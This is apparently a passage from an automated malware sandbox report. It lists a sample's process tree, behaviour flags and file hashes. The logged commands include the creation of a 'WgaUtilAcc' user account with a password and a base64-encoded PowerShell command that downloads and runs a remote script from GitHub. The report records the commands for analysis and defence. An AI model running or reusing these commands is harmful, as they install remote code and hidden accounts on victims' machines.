- Suspicious use of WriteProcessMemory
PID:1652 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc i0aAay1y3⤵PID:684
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵
- Suspicious use of WriteProcessMemory
PID:424 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵PID:2696
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵PID:2752
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
- Modifies data under HKEY_USERS
PID:3872
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵PID:1296
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵PID:1208
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:2268
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
61a26cc967cbe792b4ed22638776f04c
SHA1b1223787103eaafaabe6d1d3f66c31b50dd0c9b9
SHA256a3ec92ea114aa024a825046dee49cf3a82343305da4bc41885fc2704012b4ce6
SHA512099b63da57b49e4dbbc0acec1592841c59268d35d0920b835fdc8be6be7b23a27a0027ce24404c95be54720bd2474e39063b323e05387cde4bd9b639ba98d20f
-
MD5
3447df88de7128bdc34942334b2fab98
SHA1519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb
SHA2569520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9
SHA5122ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f
-
MD5
2ac58884a6bc6115ac734d8f7e9dcff5
SHA17f1a83359e741a82aae8ead8f1b2dd67e76d93a5
SHA256a328305f6d633db8b9de84d59a608d477d58b6c78b6f26a57303ced1d1acbf53
SHA512dacfdeafe0e5e5370a3f8a49ec4505840508888c642310b6e482b7559116948145682e9b3964617734a74dfa9ecfddf0b7bf90f7751c34d7d08f6b6d6d800d4c
-
MD5
ac3ef7653d1f1794c99d0cfcdecb5287
SHA102b0d8cbfee43ceec86cb8e20315b77e3bc58237
SHA256bbd4ce87c6375af22b2b96d5af290627013066c5afca43266546c0e0b01c3bf3
SHA51269c3e361d8e65498bdd016f4c600b8cd5959e973a28ded6cbefa3cc0186c18c8f8e9fb367231eecc2609325ea8ca9a9c39b3c03f7131294a2100fc89d46a0517
-
MD5
95168593db67746dd8c9d02f2ae09598
SHA120eda3f80444df0bc160f5b0d0ab4fa820618442
SHA256fd09f4efd132c3db937fb45de242d5e7e3c392e5fe0a463cfd3ddd0d31f88c7f
SHA5125e56ec1e41c8a3598aca2f02e83e27d515756ae3e89a622dcbebe672476e66e7a7103da610a14efaa0ff254d91dceb17228b9fdd9ca4132b8ac28b46429fc794
-
MD5
4864fc038c0b4d61f508d402317c6e9a
SHA172171db3eea76ecff3f7f173b0de0d277b0fede7
SHA2560f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84
SHA5129e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31
-
MD5
1beeba88aa06c9ccfc2eb492a3480184
SHA1e2fab8ebd651a0f3bbfb5091e8ba1e0da570aaa4
SHA256fa1faab8896afddb38ce7365397017b2f147bd2b172ca2198eb605680e5b986d
SHA512af6028a0e9cf69e35814d387ef702ad1a253a32766e0c6e29b4271e4fa0a10f25f9f1141e8b8aadbf07436cb53781538017cc6c6c22ca48c870b4d1496f7a2c8
-
MD5
3a434e30924f88a47fa7fc31e1821106
SHA1b0d245fb30c2b311a2cdf7998c5109a2151cf5a4
SHA256c1908713db3a7c8fa0dda2f4a332b00b7082910a08704d4b37b26f39f4712b28
SHA51274c0a5382a725c78db73b9dcc71445747b05171dda27c21d6688800323fb3daf365d6ce05259415db7e7504f42e401a2535a25eefa49988c605ae2853413e84e
-
MD5
c174d5f4b03f158ed3c3ac6579bc9d9f
SHA19a3f5c59cdcefe0097accab914e1896030e40e62
SHA2567ed9b5536d19ad840881d068719dbc95da230bf00ba647bf1340bc5666daf2c7
SHA5128ebd5f4a064c960eaaf0d5be4fe1463aa85e092bf4a3f81d05bb14df6e5400c80a5018a1c2a0d94f4618ce032b41567e66d0f328b443c13e09ac9e0110004f17